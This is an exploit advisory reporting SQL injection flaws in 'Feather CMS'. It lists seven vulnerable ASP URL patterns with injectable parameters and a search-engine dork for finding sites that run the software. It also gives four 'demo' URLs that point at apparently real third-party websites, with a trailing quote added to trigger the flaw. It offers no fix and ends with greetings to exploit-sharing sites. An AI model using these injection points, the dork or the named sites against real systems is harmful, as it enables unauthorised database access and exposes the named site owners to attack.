######################################################################################## # # # Exploit Title : Feather CMS SQL Injection Vulnerability # # # # Author : Secure-Land Security Team # # # # Discovered By : farbodmahini # # # # Home : Secure-Land.net # # # # Version : All Version # # # # Vendor : www.kpsy.net # # # # Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com # # # # Security Risk : High # # # # DorK : "Powered by: Feather Inc" # # # # # ######################################################################################## # # # Expl0iT: # # # # http://[TarGeT]/products.asp?action=type&id=[SQL] # # http://[TarGeT]/recommend.asp?action=type&id=[SQL] # # http://[TarGeT]/case.asp?type=[SQL]&show=[SQL] # # http://[TarGeT]/service.asp?type=[SQL]&show=[SQL] # # http://[TarGeT]/contact.asp?type=[SQL]&show=[SQL] # # http://[TarGeT]/company.asp?type=[SQL]&show=[SQL] # # http://[TarGeT]/events.asp?type=[SQL] # # # # # # Demo : # # # # http://www.pyledlight.com/en/company.asp?type=17&show=302' # # http://www.weiqiang.net/en/products.asp?action=type&id=1' # # http://www.weiqiang.net/en/events.asp?type=10' # # http://www.pyledlight.com/en/case.asp?type=11&show=310' # # # ######################################################################################## # # # Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us # # # ######################################################################################## # # # Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id # # # ########################################################################################